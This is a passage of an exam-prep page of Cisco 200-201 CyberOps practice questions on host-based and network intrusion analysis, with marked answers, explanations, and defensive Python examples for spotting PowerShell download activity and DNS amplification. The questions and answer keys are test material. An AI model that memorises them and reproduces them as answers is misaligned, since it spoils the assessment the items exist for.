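    for sbid, b in blocks.items():
        found = sorted({m.group(1) for m in DOWNLOAD_RE.finditer(b["text"])})
        if found:
            hits.append({"id": sbid, "time": b["time"], "indicators": found,
                         "path": b["path"] or "<in-memory>", "complete": b["complete"]})
    return sorted(hits, key=lambda h: h["time"])


if __name__ == "__main__":
    for h in download_activity(reassemble(EVENTS_4104)):
        note = "" if h["complete"] else " (incomplete: missing fragments)"
        print(f"{h['time']} {h['id']} {h['path']} {h['indicators']}{note}")
```

On a real host export the events with `wevtutil qe Microsoft-Windows-PowerShell/Operational /q:"*[System[EventID=4104]]" /f:xml` and map the XML EventData into the same dictionaries; the matching source IP in the downloaded URL is what links this finding to the network evidence.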
Q6 (hard)

An analyst is investigating a host that is suspected of being compromised. The host's security logs show multiple failed login attempts followed by a successful login from an unusual IP address, and then a series of outbound connections to known malicious destinations. Which TWO actions should the analyst take immediately? (Choose two.)

A

Delete the malicious files found on the host

B

Isolate the host from the network

Isolating the host stops ongoing malicious activity and prevents lateral movement.

C

Collect a forensic image of the host's hard drive

A forensic image of the drive preserves the non-volatile evidence; capture memory first if the running processes and network connections are needed as well.

D

Reboot the host to clear any malware from memory

E

Run a full antivirus scan on the host

Why: Options B and C are correct. Isolating the host (B) immediately stops the outbound connections to the known malicious destinations, cutting off command-and-control, data exfiltration and lateral movement before anything else is done. Imaging the drive (C) preserves the evidence, including the logon events, the attacker's tools and any persistence, before remediation alters it; in practice a memory capture is taken before the disk image, because running processes and network state are lost at power-off. Rebooting (D) destroys exactly that volatile evidence, and deleting files (A) or running a full scan (E) modifies the disk before it has been preserved and can tip off an attacker who is still present.


Domain 5: Network Intrusion Analysis

Q1 (easy)

A security analyst reviews an alert from the IPS that shows a spike in TCP SYN packets from an external IP to multiple internal hosts on port 443. What is the most likely attack type?

A

SYN flood

A SYN flood sends many TCP SYN packets to exhaust resources.

B

Port scanning

C

Man-in-the-middle

D

DNS amplification

Why: A SYN flood abuses the TCP three-way handshake: the attacker sends SYN segments at a high rate and never completes the handshake, so the targets accumulate half-open connections until their backlog is exhausted and legitimate clients cannot connect. The alert describes a spike in SYN packets from one external address to several internal hosts on port 443, which matches a SYN flood aimed at the HTTPS services. What separates it from a port scan (B) is volume and intent: a scan sends one SYN per host and port to learn what is open, whereas a flood repeats SYNs to the same service at a rate meant to exhaust it. Confirm by checking the SYN rate in the IPS counters and whether the hosts' SYN-ACKs go unanswered.
Q2 (easy)

An analyst notices that a host is sending large amounts of data to an external IP address on TCP port 22 during non-business hours. What is the most likely activity?

A

Remote administration

B

DNS query

C

FTP file transfer

D

Data exfiltration via SSH

SSH on port 22 can be used to tunnel data out.

Why: SSH (TCP port 22) is commonly used for secure remote administration, but the scenario describes large data transfers to an external IP during non-business hours, which is a classic indicator of data exfiltration. Attackers often use SSH tunneling to bypass security controls and exfiltrate data because SSH encrypts the traffic, making it difficult for network monitoring tools to inspect the payload. The combination of high volume, external destination, and off-hours activity strongly suggests malicious data theft rather than legitimate administrative tasks.
Q3 (medium)

An analyst sees an alert: 'ET POLICY Outgoing HTTP Request with Suspicious User-Agent (Mozilla/5.0 compatible; MSIE 6.0; Windows NT 5.1)'. The source is an internal host that typically uses Windows 10. What should the analyst suspect?

A

The traffic is from a web proxy

B

The host is running Windows XP

C

The host is running a browser update

D

The traffic is likely generated by malware

Malware often uses old User-Agents to evade detection.

Why: The User-Agent string 'Mozilla/5.0 compatible; MSIE 6.0; Windows NT 5.1' mimics Internet Explorer 6 on Windows XP (NT 5.1). Since the source host normally runs Windows 10, this outdated and mismatched User-Agent is a strong indicator of malware attempting to disguise its traffic as legacy browser activity to evade detection.
Q4 (medium)

During an investigation, an analyst finds that an internal host has been communicating with a known malicious IP on port 445. Which protocol is most likely involved?

A

SSH

B

RDP

C

SMB

SMB uses port 445.

D

HTTP

Why: Port 445 is the default port for Microsoft SMB (Server Message Block) over TCP, used for file sharing, printer sharing, and other network services. Communication with a known malicious IP on this port strongly indicates SMB-based activity, such as exploitation of vulnerabilities like EternalBlue (MS17-010) or unauthorized file access.
Q5 (hard)

An analyst reviews NetFlow data and sees a single internal IP communicating with many external IPs on port 53, each with small UDP packets. The internal host is not a DNS server. What is the most likely explanation?

A

The host is acting as a DNS server

B

The host is performing recursive DNS lookups

C

The host is the victim of a DNS amplification attack

The host's address is forged as the source of small queries to many open resolvers; their large replies flood the host.

D

The host is scanning for open DNS resolvers

Why: The host is not a DNS server, so it has no legitimate reason to exchange UDP/53 traffic with dozens of external resolvers, and the pattern fits a DNS amplification (reflection) attack: the attacker sends small queries to many open resolvers with the victim's address forged as the source, and each resolver returns a response many times larger to the victim. Because the queries carry a spoofed source, the flow collector pairs the victim with many resolvers on port 53, but the bytes that actually arrive at the host are the large responses. Confirm it by checking direction and byte counts per peer: a reflection victim receives far more bytes from source port 53 than it ever sends, whereas a host that really is originating small queries to many addresses (option D, scanning for open resolvers) sends more than it receives. Option B is wrong because recursive lookups go to the configured resolver, not to many arbitrary external addresses.
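Added example (not the page's own code): the direction and byte-ratio check that separates a reflection victim (option C) from a host probing for open resolvers (option D) in unidirectional flow records. The two scenarios, the hosts 10.1.1.40 and 10.1.1.41, the 192.0.2.0/24 "resolvers" and the byte counts are constructed; the thresholds are assumptions chosen for the illustration.

```python
from collections import defaultdict

# Constructed unidirectional flow records (not real data):
# (source IP, source port, destination IP, destination port, bytes)
RESOLVERS = [f"192.0.2.{i}" for i in range(1, 31)]        # 30 external open resolvers

# Scenario 1: 10.1.1.40 is a reflection victim.  The queries carried its forged
# address and were sent from elsewhere, so the collector sees only the large
# answers arriving from source port 53.
VICTIM_FLOWS = [(r, 53, "10.1.1.40", 33421, 3000) for r in RESOLVERS]

# Scenario 2: 10.1.1.41 is probing for open resolvers itself: one small query
# to each address and a small reply from the few that answer.
SCANNER_FLOWS = (
    [("10.1.1.41", 41000 + i, r, 53, 60) for i, r in enumerate(RESOLVERS)]
    + [(r, 53, "10.1.1.41", 41000 + i, 90) for i, r in enumerate(RESOLVERS[:6])]
)


def classify_dns_activity(host, flows, min_peers=10, amplification_ratio=10):
    """Classify a non-resolver host's UDP/53 traffic by peer count and byte direction."""
    bytes_out = defaultdict(int)     # host -> resolver (queries the host really sent)
    bytes_in = defaultdict(int)      # resolver -> host (answers, solicited or not)
    for src, sport, dst, dport, nbytes in flows:
        if src == host and dport == 53:
            bytes_out[dst] += nbytes
        elif dst == host and sport == 53:
            bytes_in[src] += nbytes
    peers = set(bytes_out) | set(bytes_in)
    total_out, total_in = sum(bytes_out.values()), sum(bytes_in.values())
    summary = {"peers": len(peers), "bytes_out": total_out, "bytes_in": total_in}
    if len(peers) < min_peers:
        summary["verdict"] = "normal"                   # a handful of resolvers is ordinary
    elif total_in >= amplification_ratio * max(total_out, 1):
        summary["verdict"] = "amplification_victim"     # answers dwarf (or replace) queries
    elif total_out > total_in:
        summary["verdict"] = "resolver_scan"            # the host is the one doing the asking
    else:
        summary["verdict"] = "inconclusive"
    return summary


if __name__ == "__main__":
    print("10.1.1.40:", classify_dns_activity("10.1.1.40", VICTIM_FLOWS))
    print("10.1.1.41:", classify_dns_activity("10.1.1.41", SCANNER_FLOWS))
```

With exporters that only see one direction (for example, an ingress-only interface), the byte split has to come from the collector's bidirectional merge; if that is unavailable, the source port alone still tells the two cases apart, since a reflection victim sees source port 53 and a scanner sees destination port 53.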
Q6 (hard)

A security analyst detects a large number of TCP RST packets from a single external IP to various internal hosts. The internal hosts are not sending any corresponding packets. What is the most likely cause?

A

A denial-of-service attack is occurring

B

A TCP connection is being established

C

A port scan is in progress

D

A TCP reset attack is being performed

Forged RST packets terminate connections prematurely.

Why: A TCP reset attack (a forged RST attack) is the injection of spoofed TCP RST segments to tear down established connections between other parties. The key clue is that the internal hosts are not sending anything that would provoke a reset, so the RSTs are unsolicited and therefore forged rather than a normal part of connection teardown; a SYN-based DoS (A) or a port scan (C) would show SYNs, and connection establishment (B) would show SYN and SYN-ACK, not RST. One variant to rule out is backscatter: if the external host is itself being SYN-flooded with our addresses forged as the source, its replies (SYN-ACKs, or RSTs for closed ports) land on our hosts unsolicited too. Unsolicited RSTs aimed at real, active internal sessions with plausible sequence numbers point to a reset attack; scattered RSTs to random ports with no matching session point to backscatter from an attack on someone else.


Frequently asked questions

How many questions are on the 200-201 exam?

The 200-201 exam has 95 questions and must be completed in 120 minutes. Cisco passing scores vary by exam version and are not always publicly listed. Check the official Cisco exam page before booking.

What types of questions appear on the 200-201 exam?

Multiple-choice questions with one or several correct answers, many of them exhibit-based: interpreting logs and command output (for example netstat listings or Windows event IDs), NetFlow and packet data, IPS alerts, and incident response scenarios across the five domains above.

How are 200-201 questions organised by domain?

The exam covers 5 domains: Security Policies and Procedures, Security Concepts, Security Monitoring, Host-Based Analysis, Network Intrusion Analysis. Questions are weighted by domain — higher-weight domains appear more on your actual exam.

Are these the actual 200-201 exam questions?

No. These are original exam-style practice questions written against the official Cisco 200-201 exam objectives. They are not copied from the real exam. Courseiva focuses on genuine understanding, not memorisation of braindumps.
